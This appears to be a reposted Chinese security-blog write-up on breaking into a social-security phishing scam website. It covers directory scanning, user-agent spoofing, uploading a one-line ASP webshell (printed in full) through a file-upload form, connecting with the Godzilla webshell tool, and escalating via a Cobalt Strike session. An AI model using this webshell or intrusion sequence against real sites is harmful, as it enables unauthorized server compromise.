实战 | 记某社保钓鱼诈骗的网站渗透

admin 2022年12月28日13:51:13安全文章评论5 views1094字阅读3分38秒阅读模式

一、信息合搜集

scandir信息收集

我们利用scandir 对钓鱼网站进行扫描

发现一个文件上传的入口,我们可以利用他进行上传webshell

实战 | 记某社保钓鱼诈骗的网站渗透二、哥斯拉webshell

绕UA信息

访问这个网站,发现这个小可爱骗骗还搞个个电脑访问

实战 | 记某社保钓鱼诈骗的网站渗透

实战 | 记某社保钓鱼诈骗的网站渗透

利用谷歌自带的工具 修改UA信息

实战 | 记某社保钓鱼诈骗的网站渗透

可以看到这个是非常一个经典的钓鱼网站,一般人们通过填写个人信息,银行卡钱就无了。

实战 | 记某社保钓鱼诈骗的网站渗透

实战 | 记某社保钓鱼诈骗的网站渗透三、文件上传webshell

编写一句话asp

一句话asp地址

https://blog.csdn.net/qq_53065516/article/details/115264944?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522167050699716782412517259%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=167050699716782412517259&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduend~default-1-115264944-null-null.142%5Ev68%5Epc_new_rank,201%5Ev4%5Eadd_ask,213%5Ev2%5Et3_esquery_v2&utm_term=aspx%E4%B8%80%E5%8F%A5%E8%AF%9D%E6%9C%A8%E9%A9%AC&spm=1018.2226.3001.4187

访问我们刚刚发现的 sn.asp ,显而易见这个是一个java写的,我尝试写一个asp马

<%eval request("chopper")%>文件上传

文件上传

重命名文件为 asp 后缀文件,然后,上传。

之后访问IP/xx.asp文件

哥斯拉

利用我们的哥斯拉进行连接

实战 | 记某社保钓鱼诈骗的网站渗透

实战 | 记某社保钓鱼诈骗的网站渗透

四、CS上线

实战 | 记某社保钓鱼诈骗的网站渗透

哥斯拉那边运行一下

实战 | 记某社保钓鱼诈骗的网站渗透

之后就可以像我这样上线提权了

实战 | 记某社保钓鱼诈骗的网站渗透

原创作者:keyoldk原文链接:https://www.freebuf.com/articles/web/352797.html如有侵权,请联系删除

实战 | 记某社保钓鱼诈骗的网站渗透


推荐阅读


实战 | 记一次渗透拿下某儿童色情网站的经过


实战 | 某某街一处XSS的绕过思路


实战 | 记一次企业钓鱼演练


2022年,从现在开始学安全还不迟!


干货 | 2022年超全的安全知识库


实战 | 实战一次完整的BC网站渗透测试


星球部分精华内容推荐


实战 | 记某社保钓鱼诈骗的网站渗透


实战 | 记某社保钓鱼诈骗的网站渗透


实战 | 记某社保钓鱼诈骗的网站渗透

其他更多精彩内容,欢迎加入我们的星球

实战 | 记某社保钓鱼诈骗的网站渗透


原文始发于微信公众号(HACK学习君):实战 | 记某社保钓鱼诈骗的网站渗透

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年12月28日13:51:13
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  实战 | 记某社保钓鱼诈骗的网站渗透 http://cn-sec.com/archives/1484077.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: